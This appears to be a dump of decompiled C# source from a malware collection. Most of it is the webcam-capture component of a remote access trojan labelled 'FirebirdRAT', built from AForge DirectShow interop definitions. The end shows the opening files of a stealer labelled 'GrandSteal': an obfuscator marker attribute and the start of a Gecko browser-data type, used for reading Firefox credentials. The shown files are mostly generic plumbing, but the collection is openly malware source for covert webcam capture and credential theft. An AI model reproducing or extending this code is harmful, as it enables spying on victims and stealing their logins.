 6 | 	// Token: 0x0200001E RID: 30
 7 | 	[ComVisible(true)]
 8 | 	[Guid("56a868c0-0ad4-11ce-b03a-0020af0ba770")]
 9 | 	[InterfaceType(ComInterfaceType.InterfaceIsDual)]
10 | 	[ComImport]
11 | 	internal interface IMediaEventEx
12 | 	{
13 | 		// Token: 0x060000AD RID: 173
14 | 		[PreserveSig]
15 | 		int GetEventHandle(out IntPtr hEvent);
16 | 
17 | 		// Token: 0x060000AE RID: 174
18 | 		[PreserveSig]
19 | 		int GetEvent([MarshalAs(UnmanagedType.I4)] out DsEvCode lEventCode, out IntPtr lParam1, out IntPtr lParam2, int msTimeout);
20 | 
21 | 		// Token: 0x060000AF RID: 175
22 | 		[PreserveSig]
23 | 		int WaitForCompletion(int msTimeout, out int pEvCode);
24 | 
25 | 		// Token: 0x060000B0 RID: 176
26 | 		[PreserveSig]
27 | 		int CancelDefaultHandling(int lEvCode);
28 | 
29 | 		// Token: 0x060000B1 RID: 177
30 | 		[PreserveSig]
31 | 		int RestoreDefaultHandling(int lEvCode);
32 | 
33 | 		// Token: 0x060000B2 RID: 178
34 | 		[PreserveSig]
35 | 		int FreeEventParams([MarshalAs(UnmanagedType.I4)] [In] DsEvCode lEvCode, IntPtr lParam1, IntPtr lParam2);
36 | 
37 | 		// Token: 0x060000B3 RID: 179
38 | 		[PreserveSig]
39 | 		int SetNotifyWindow(IntPtr hwnd, int lMsg, IntPtr lInstanceData);
40 | 
41 | 		// Token: 0x060000B4 RID: 180
42 | 		[PreserveSig]
43 | 		int SetNotifyFlags(int lNoNotifyFlags);
44 | 
45 | 		// Token: 0x060000B5 RID: 181
46 | 		[PreserveSig]
47 | 		int GetNotifyFlags(out int lplNoNotifyFlags);
48 | 	}
49 | }
50 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IPin.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200001F RID: 31
 7 | 	[Guid("56A86891-0AD4-11CE-B03A-0020AF0BA770")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IPin
11 | 	{
12 | 		// Token: 0x060000B6 RID: 182
13 | 		[PreserveSig]
14 | 		int Connect([In] IPin receivePin, [MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
15 | 
16 | 		// Token: 0x060000B7 RID: 183
17 | 		[PreserveSig]
18 | 		int ReceiveConnection([In] IPin receivePin, [MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
19 | 
20 | 		// Token: 0x060000B8 RID: 184
21 | 		[PreserveSig]
22 | 		int Disconnect();
23 | 
24 | 		// Token: 0x060000B9 RID: 185
25 | 		[PreserveSig]
26 | 		int ConnectedTo(out IPin pin);
27 | 
28 | 		// Token: 0x060000BA RID: 186
29 | 		[PreserveSig]
30 | 		int ConnectionMediaType([MarshalAs(UnmanagedType.LPStruct)] [Out] AMMediaType mediaType);
31 | 
32 | 		// Token: 0x060000BB RID: 187
33 | 		[PreserveSig]
34 | 		int QueryPinInfo(out PinInfo pinInfo);
35 | 
36 | 		// Token: 0x060000BC RID: 188
37 | 		[PreserveSig]
38 | 		int QueryDirection(out PinDirection pinDirection);
39 | 
40 | 		// Token: 0x060000BD RID: 189
41 | 		[PreserveSig]
42 | 		int QueryId([MarshalAs(UnmanagedType.LPWStr)] out string id);
43 | 
44 | 		// Token: 0x060000BE RID: 190
45 | 		[PreserveSig]
46 | 		int QueryAccept([MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
47 | 
48 | 		// Token: 0x060000BF RID: 191
49 | 		[PreserveSig]
50 | 		int EnumMediaTypes(IntPtr enumerator);
51 | 
52 | 		// Token: 0x060000C0 RID: 192
53 | 		[PreserveSig]
54 | 		int QueryInternalConnections(IntPtr apPin, [In] [Out] ref int nPin);
55 | 
56 | 		// Token: 0x060000C1 RID: 193
57 | 		[PreserveSig]
58 | 		int EndOfStream();
59 | 
60 | 		// Token: 0x060000C2 RID: 194
61 | 		[PreserveSig]
62 | 		int BeginFlush();
63 | 
64 | 		// Token: 0x060000C3 RID: 195
65 | 		[PreserveSig]
66 | 		int EndFlush();
67 | 
68 | 		// Token: 0x060000C4 RID: 196
69 | 		[PreserveSig]
70 | 		int NewSegment(long start, long stop, double rate);
71 | 	}
72 | }
73 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IPropertyBag.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000020 RID: 32
 7 | 	[Guid("55272A00-42CB-11CE-8135-00AA004BB851")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface IPropertyBag
11 | 	{
12 | 		// Token: 0x060000C5 RID: 197
13 | 		[PreserveSig]
14 | 		int Read([MarshalAs(UnmanagedType.LPWStr)] [In] string propertyName, [MarshalAs(UnmanagedType.Struct)] [In] [Out] ref object pVar, [In] IntPtr pErrorLog);
15 | 
16 | 		// Token: 0x060000C6 RID: 198
17 | 		[PreserveSig]
18 | 		int Write([MarshalAs(UnmanagedType.LPWStr)] [In] string propertyName, [MarshalAs(UnmanagedType.Struct)] [In] ref object pVar);
19 | 	}
20 | }
21 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/IReferenceClock.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | using System.Security;
 4 | 
 5 | namespace AForge.Video.DirectShow.Internals
 6 | {
 7 | 	// Token: 0x02000021 RID: 33
 8 | 	[SuppressUnmanagedCodeSecurity]
 9 | 	[Guid("56a86897-0ad4-11ce-b03a-0020af0ba770")]
10 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
11 | 	[ComImport]
12 | 	internal interface IReferenceClock
13 | 	{
14 | 		// Token: 0x060000C7 RID: 199
15 | 		[PreserveSig]
16 | 		int GetTime(out long pTime);
17 | 
18 | 		// Token: 0x060000C8 RID: 200
19 | 		[PreserveSig]
20 | 		int AdviseTime([In] long baseTime, [In] long streamTime, [In] IntPtr hEvent, out int pdwAdviseCookie);
21 | 
22 | 		// Token: 0x060000C9 RID: 201
23 | 		[PreserveSig]
24 | 		int AdvisePeriodic([In] long startTime, [In] long periodTime, [In] IntPtr hSemaphore, out int pdwAdviseCookie);
25 | 
26 | 		// Token: 0x060000CA RID: 202
27 | 		[PreserveSig]
28 | 		int Unadvise([In] int dwAdviseCookie);
29 | 	}
30 | }
31 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/ISampleGrabber.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000022 RID: 34
 7 | 	[Guid("6B652FFF-11FE-4FCE-92AD-0266B5D7C78F")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface ISampleGrabber
11 | 	{
12 | 		// Token: 0x060000CB RID: 203
13 | 		[PreserveSig]
14 | 		int SetOneShot([MarshalAs(UnmanagedType.Bool)] [In] bool oneShot);
15 | 
16 | 		// Token: 0x060000CC RID: 204
17 | 		[PreserveSig]
18 | 		int SetMediaType([MarshalAs(UnmanagedType.LPStruct)] [In] AMMediaType mediaType);
19 | 
20 | 		// Token: 0x060000CD RID: 205
21 | 		[PreserveSig]
22 | 		int GetConnectedMediaType([MarshalAs(UnmanagedType.LPStruct)] [Out] AMMediaType mediaType);
23 | 
24 | 		// Token: 0x060000CE RID: 206
25 | 		[PreserveSig]
26 | 		int SetBufferSamples([MarshalAs(UnmanagedType.Bool)] [In] bool bufferThem);
27 | 
28 | 		// Token: 0x060000CF RID: 207
29 | 		[PreserveSig]
30 | 		int GetCurrentBuffer(ref int bufferSize, IntPtr buffer);
31 | 
32 | 		// Token: 0x060000D0 RID: 208
33 | 		[PreserveSig]
34 | 		int GetCurrentSample(IntPtr sample);
35 | 
36 | 		// Token: 0x060000D1 RID: 209
37 | 		[PreserveSig]
38 | 		int SetCallback(ISampleGrabberCB callback, int whichMethodToCallback);
39 | 	}
40 | }
41 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/ISampleGrabberCB.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000023 RID: 35
 7 | 	[Guid("0579154A-2B53-4994-B0D0-E773148EFF85")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface ISampleGrabberCB
11 | 	{
12 | 		// Token: 0x060000D2 RID: 210
13 | 		[PreserveSig]
14 | 		int SampleCB(double sampleTime, IntPtr sample);
15 | 
16 | 		// Token: 0x060000D3 RID: 211
17 | 		[PreserveSig]
18 | 		int BufferCB(double sampleTime, IntPtr buffer, int bufferLen);
19 | 	}
20 | }
21 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/ISpecifyPropertyPages.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000024 RID: 36
 7 | 	[Guid("B196B28B-BAB4-101A-B69C-00AA00341D07")]
 8 | 	[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 9 | 	[ComImport]
10 | 	internal interface ISpecifyPropertyPages
11 | 	{
12 | 		// Token: 0x060000D4 RID: 212
13 | 		[PreserveSig]
14 | 		int GetPages(out CAUUID pPages);
15 | 	}
16 | }
17 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/MediaSubType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000035 RID: 53
 7 | 	[ComVisible(false)]
 8 | 	internal static class MediaSubType
 9 | 	{
10 | 		// Token: 0x040000A5 RID: 165
11 | 		public static readonly Guid RGB24 = new Guid(3828804477u, 21071, 4558, 159, 83, 0, 32, 175, 11, 167, 112);
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/MediaType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000034 RID: 52
 7 | 	[ComVisible(false)]
 8 | 	internal static class MediaType
 9 | 	{
10 | 		// Token: 0x040000A4 RID: 164
11 | 		public static readonly Guid Video1 = new Guid(1935960438, 0, 16, 128, 0, 0, 170, 0, 56, 155, 113);
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/PinCategory.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000036 RID: 54
 7 | 	[ComVisible(false)]
 8 | 	internal static class PinCategory
 9 | 	{
10 | 		// Token: 0x040000A6 RID: 166
11 | 		public static readonly Guid Capture = new Guid(4218176129u, 851, 4561, 144, 95, 0, 0, 192, 204, 22, 186);
12 | 
13 | 		// Token: 0x040000A7 RID: 167
14 | 		public static readonly Guid StillImage = new Guid(4218176138u, 851, 4561, 144, 95, 0, 0, 192, 204, 22, 186);
15 | 	}
16 | }
17 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/PinDirection.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000025 RID: 37
 7 | 	[ComVisible(false)]
 8 | 	internal enum PinDirection
 9 | 	{
10 | 		// Token: 0x04000039 RID: 57
11 | 		Input,
12 | 		// Token: 0x0400003A RID: 58
13 | 		Output
14 | 	}
15 | }
16 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/PinInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000027 RID: 39
 7 | 	[ComVisible(false)]
 8 | 	[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode, Pack = 1)]
 9 | 	internal struct PinInfo
10 | 	{
11 | 		// Token: 0x04000044 RID: 68
12 | 		public IBaseFilter Filter;
13 | 
14 | 		// Token: 0x04000045 RID: 69
15 | 		public PinDirection Direction;
16 | 
17 | 		// Token: 0x04000046 RID: 70
18 | 		[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
19 | 		public string Name;
20 | 	}
21 | }
22 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/RECT.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200002C RID: 44
 7 | 	[ComVisible(false)]
 8 | 	internal struct RECT
 9 | 	{
10 | 		// Token: 0x04000066 RID: 102
11 | 		public int Left;
12 | 
13 | 		// Token: 0x04000067 RID: 103
14 | 		public int Top;
15 | 
16 | 		// Token: 0x04000068 RID: 104
17 | 		public int Right;
18 | 
19 | 		// Token: 0x04000069 RID: 105
20 | 		public int Bottom;
21 | 	}
22 | }
23 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/VideoControlFlags.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000030 RID: 48
 7 | 	[Flags]
 8 | 	[ComVisible(false)]
 9 | 	internal enum VideoControlFlags
10 | 	{
11 | 		// Token: 0x04000085 RID: 133
12 | 		FlipHorizontal = 1,
13 | 		// Token: 0x04000086 RID: 134
14 | 		FlipVertical = 2,
15 | 		// Token: 0x04000087 RID: 135
16 | 		ExternalTriggerEnable = 4,
17 | 		// Token: 0x04000088 RID: 136
18 | 		Trigger = 8
19 | 	}
20 | }
21 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/VideoInfoHeader.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x02000029 RID: 41
 7 | 	[ComVisible(false)]
 8 | 	internal struct VideoInfoHeader
 9 | 	{
10 | 		// Token: 0x04000049 RID: 73
11 | 		public RECT SrcRect;
12 | 
13 | 		// Token: 0x0400004A RID: 74
14 | 		public RECT TargetRect;
15 | 
16 | 		// Token: 0x0400004B RID: 75
17 | 		public int BitRate;
18 | 
19 | 		// Token: 0x0400004C RID: 76
20 | 		public int BitErrorRate;
21 | 
22 | 		// Token: 0x0400004D RID: 77
23 | 		public long AverageTimePerFrame;
24 | 
25 | 		// Token: 0x0400004E RID: 78
26 | 		public BitmapInfoHeader BmiHeader;
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/VideoInfoHeader2.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | namespace AForge.Video.DirectShow.Internals
 5 | {
 6 | 	// Token: 0x0200002A RID: 42
 7 | 	[ComVisible(false)]
 8 | 	internal struct VideoInfoHeader2
 9 | 	{
10 | 		// Token: 0x0400004F RID: 79
11 | 		public RECT SrcRect;
12 | 
13 | 		// Token: 0x04000050 RID: 80
14 | 		public RECT TargetRect;
15 | 
16 | 		// Token: 0x04000051 RID: 81
17 | 		public int BitRate;
18 | 
19 | 		// Token: 0x04000052 RID: 82
20 | 		public int BitErrorRate;
21 | 
22 | 		// Token: 0x04000053 RID: 83
23 | 		public long AverageTimePerFrame;
24 | 
25 | 		// Token: 0x04000054 RID: 84
26 | 		public int InterlaceFlags;
27 | 
28 | 		// Token: 0x04000055 RID: 85
29 | 		public int CopyProtectFlags;
30 | 
31 | 		// Token: 0x04000056 RID: 86
32 | 		public int PictAspectRatioX;
33 | 
34 | 		// Token: 0x04000057 RID: 87
35 | 		public int PictAspectRatioY;
36 | 
37 | 		// Token: 0x04000058 RID: 88
38 | 		public int Reserved1;
39 | 
40 | 		// Token: 0x04000059 RID: 89
41 | 		public int Reserved2;
42 | 
43 | 		// Token: 0x0400005A RID: 90
44 | 		public BitmapInfoHeader BmiHeader;
45 | 	}
46 | }
47 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/VideoStreamConfigCaps.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Drawing;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | namespace AForge.Video.DirectShow.Internals
 6 | {
 7 | 	// Token: 0x02000031 RID: 49
 8 | 	[ComVisible(false)]
 9 | 	[StructLayout(LayoutKind.Sequential)]
10 | 	internal class VideoStreamConfigCaps
11 | 	{
12 | 		// Token: 0x04000089 RID: 137
13 | 		public Guid Guid;
14 | 
15 | 		// Token: 0x0400008A RID: 138
16 | 		public AnalogVideoStandard VideoStandard;
17 | 
18 | 		// Token: 0x0400008B RID: 139
19 | 		public Size InputSize;
20 | 
21 | 		// Token: 0x0400008C RID: 140
22 | 		public Size MinCroppingSize;
23 | 
24 | 		// Token: 0x0400008D RID: 141
25 | 		public Size MaxCroppingSize;
26 | 
27 | 		// Token: 0x0400008E RID: 142
28 | 		public int CropGranularityX;
29 | 
30 | 		// Token: 0x0400008F RID: 143
31 | 		public int CropGranularityY;
32 | 
33 | 		// Token: 0x04000090 RID: 144
34 | 		public int CropAlignX;
35 | 
36 | 		// Token: 0x04000091 RID: 145
37 | 		public int CropAlignY;
38 | 
39 | 		// Token: 0x04000092 RID: 146
40 | 		public Size MinOutputSize;
41 | 
42 | 		// Token: 0x04000093 RID: 147
43 | 		public Size MaxOutputSize;
44 | 
45 | 		// Token: 0x04000094 RID: 148
46 | 		public int OutputGranularityX;
47 | 
48 | 		// Token: 0x04000095 RID: 149
49 | 		public int OutputGranularityY;
50 | 
51 | 		// Token: 0x04000096 RID: 150
52 | 		public int StretchTapsX;
53 | 
54 | 		// Token: 0x04000097 RID: 151
55 | 		public int StretchTapsY;
56 | 
57 | 		// Token: 0x04000098 RID: 152
58 | 		public int ShrinkTapsX;
59 | 
60 | 		// Token: 0x04000099 RID: 153
61 | 		public int ShrinkTapsY;
62 | 
63 | 		// Token: 0x0400009A RID: 154
64 | 		public long MinFrameInterval;
65 | 
66 | 		// Token: 0x0400009B RID: 155
67 | 		public long MaxFrameInterval;
68 | 
69 | 		// Token: 0x0400009C RID: 156
70 | 		public int MinBitsPerSecond;
71 | 
72 | 		// Token: 0x0400009D RID: 157
73 | 		public int MaxBitsPerSecond;
74 | 	}
75 | }
76 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/Internals/Win32.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | using System.Runtime.InteropServices.ComTypes;
 4 | 
 5 | namespace AForge.Video.DirectShow.Internals
 6 | {
 7 | 	// Token: 0x02000038 RID: 56
 8 | 	internal static class Win32
 9 | 	{
10 | 		// Token: 0x060000E0 RID: 224
11 | 		[DllImport("ole32.dll")]
12 | 		public static extern int CreateBindCtx(int reserved, out IBindCtx ppbc);
13 | 
14 | 		// Token: 0x060000E1 RID: 225
15 | 		[DllImport("ole32.dll", CharSet = CharSet.Unicode)]
16 | 		public static extern int MkParseDisplayName(IBindCtx pbc, string szUserName, ref int pchEaten, out IMoniker ppmk);
17 | 
18 | 		// Token: 0x060000E2 RID: 226
19 | 		[DllImport("ntdll.dll", CallingConvention = CallingConvention.Cdecl)]
20 | 		public unsafe static extern int memcpy(byte* dst, byte* src, int count);
21 | 
22 | 		// Token: 0x060000E3 RID: 227
23 | 		[DllImport("oleaut32.dll")]
24 | 		public static extern int OleCreatePropertyFrame(IntPtr hwndOwner, int x, int y, [MarshalAs(UnmanagedType.LPWStr)] string caption, int cObjects, [MarshalAs(UnmanagedType.Interface)] ref object ppUnk, int cPages, IntPtr lpPageClsID, int lcid, int dwReserved, IntPtr lpvReserved);
25 | 	}
26 | }
27 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/PhysicalConnectorType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace AForge.Video.DirectShow
 4 | {
 5 | 	// Token: 0x0200000C RID: 12
 6 | 	public enum PhysicalConnectorType
 7 | 	{
 8 | 		// Token: 0x0400000F RID: 15
 9 | 		Default,
10 | 		// Token: 0x04000010 RID: 16
11 | 		VideoDecoder,
12 | 		// Token: 0x04000011 RID: 17
13 | 		AudioTuner = 4096
14 | 	}
15 | }
16 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/DirectShow/VideoInput.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace AForge.Video.DirectShow
 4 | {
 5 | 	// Token: 0x02000010 RID: 16
 6 | 	public class VideoInput
 7 | 	{
 8 | 		// Token: 0x06000049 RID: 73 RVA: 0x00003825 File Offset: 0x00001A25
 9 | 		internal VideoInput(int index, PhysicalConnectorType type)
10 | 		{
11 | 			this.Index = index;
12 | 			this.Type = type;
13 | 		}
14 | 
15 | 		// Token: 0x17000008 RID: 8
16 | 		// (get) Token: 0x0600004A RID: 74 RVA: 0x0000383B File Offset: 0x00001A3B
17 | 		public static VideoInput Default1
18 | 		{
19 | 			get
20 | 			{
21 | 				return new VideoInput(-1, PhysicalConnectorType.Default);
22 | 			}
23 | 		}
24 | 
25 | 		// Token: 0x04000036 RID: 54
26 | 		public readonly int Index;
27 | 
28 | 		// Token: 0x04000037 RID: 55
29 | 		public readonly PhysicalConnectorType Type;
30 | 	}
31 | }
32 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/IVideoSource.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace AForge.Video
 4 | {
 5 | 	// Token: 0x02000003 RID: 3
 6 | 	public interface IVideoSource
 7 | 	{
 8 | 		// Token: 0x14000001 RID: 1
 9 | 		// (add) Token: 0x06000006 RID: 6
10 | 		// (remove) Token: 0x06000007 RID: 7
11 | 		event PlayingFinishedEventHandler PlayingFinished;
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/NewFrameEventArgs.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Drawing;
 3 | 
 4 | namespace AForge.Video
 5 | {
 6 | 	// Token: 0x02000008 RID: 8
 7 | 	public class NewFrameEventArgs : EventArgs
 8 | 	{
 9 | 		// Token: 0x06000014 RID: 20 RVA: 0x000021FA File Offset: 0x000003FA
10 | 		public NewFrameEventArgs(Bitmap frame2)
11 | 		{
12 | 			this.frame = frame2;
13 | 		}
14 | 
15 | 		// Token: 0x17000001 RID: 1
16 | 		// (get) Token: 0x06000015 RID: 21 RVA: 0x00002209 File Offset: 0x00000409
17 | 		public Bitmap Frame
18 | 		{
19 | 			get
20 | 			{
21 | 				return this.frame;
22 | 			}
23 | 		}
24 | 
25 | 		// Token: 0x0400000A RID: 10
26 | 		private Bitmap frame;
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/NewFrameEventHandler.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | namespace AForge.Video
4 | {
5 | 	// Token: 0x02000004 RID: 4
6 | 	// (Invoke) Token: 0x06000009 RID: 9
7 | 	public delegate void NewFrameEventHandler(object sender, NewFrameEventArgs eventArgs);
8 | }
9 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/PlayingFinishedEventHandler.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | namespace AForge.Video
4 | {
5 | 	// Token: 0x02000006 RID: 6
6 | 	// (Invoke) Token: 0x06000011 RID: 17
7 | 	public delegate void PlayingFinishedEventHandler(object sender, ReasonToFinishPlaying reason);
8 | }
9 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/ReasonToFinishPlaying.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace AForge.Video
 4 | {
 5 | 	// Token: 0x02000007 RID: 7
 6 | 	public enum ReasonToFinishPlaying
 7 | 	{
 8 | 		// Token: 0x04000008 RID: 8
 9 | 		StoppedByUser,
10 | 		// Token: 0x04000009 RID: 9
11 | 		DeviceLost
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/VideoSourceErrorEventArgs.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace AForge.Video
 4 | {
 5 | 	// Token: 0x02000009 RID: 9
 6 | 	public class VideoSourceErrorEventArgs : EventArgs
 7 | 	{
 8 | 		// Token: 0x06000016 RID: 22 RVA: 0x00002211 File Offset: 0x00000411
 9 | 		public VideoSourceErrorEventArgs(string description)
10 | 		{
11 | 			this.description = description;
12 | 		}
13 | 
14 | 		// Token: 0x0400000B RID: 11
15 | 		private string description;
16 | 	}
17 | }
18 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/AForge/Video/VideoSourceErrorEventHandler.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | namespace AForge.Video
4 | {
5 | 	// Token: 0x02000005 RID: 5
6 | 	// (Invoke) Token: 0x0600000D RID: 13
7 | 	public delegate void VideoSourceErrorEventHandler(object sender, VideoSourceErrorEventArgs eventArgs);
8 | }
9 | 


--------------------------------------------------------------------------------
/FirebirdRAT_03_2020/WebcamDll/WebcamDll/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.CompilerServices;
 5 | using System.Runtime.InteropServices;
 6 | using System.Security;
 7 | using System.Security.Permissions;
 8 | 
 9 | [assembly: AssemblyVersion("1.0.0.0")]
10 | [assembly: CompilationRelaxations(8)]
11 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
12 | [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
13 | [assembly: AssemblyTitle("WebcamDll")]
14 | [assembly: AssemblyDescription("")]
15 | [assembly: AssemblyConfiguration("")]
16 | [assembly: AssemblyCompany("")]
17 | [assembly: AssemblyProduct("WebcamDll")]
18 | [assembly: AssemblyCopyright("Copyright ©  2019")]
19 | [assembly: AssemblyTrademark("")]
20 | [assembly: ComVisible(false)]
21 | [assembly: Guid("906c8acd-a0ec-4119-ab4a-5606af5f8af8")]
22 | [assembly: AssemblyFileVersion("1.0.0.0")]
23 | [assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
24 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/-Module-.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | // Token: 0x02000001 RID: 1
4 | internal class <Module>
5 | {
6 | }
7 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/ConfusedByAttribute.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200002D RID: 45
 4 | internal class ConfusedByAttribute : Attribute
 5 | {
 6 | 	// Token: 0x060000FD RID: 253 RVA: 0x00002631 File Offset: 0x00000831
 7 | 	public ConfusedByAttribute(string string_0)
 8 | 	{
 9 | 	}
10 | }
11 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Data/GrandSteal.Client.Data/Gecko/Asn1Type.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GrandSteal.Client.Data.Gecko
 4 | {
 5 | 	// Token: 0x02000024 RID: 36
 6 | 	public enum Asn1Type
 7 | 	{
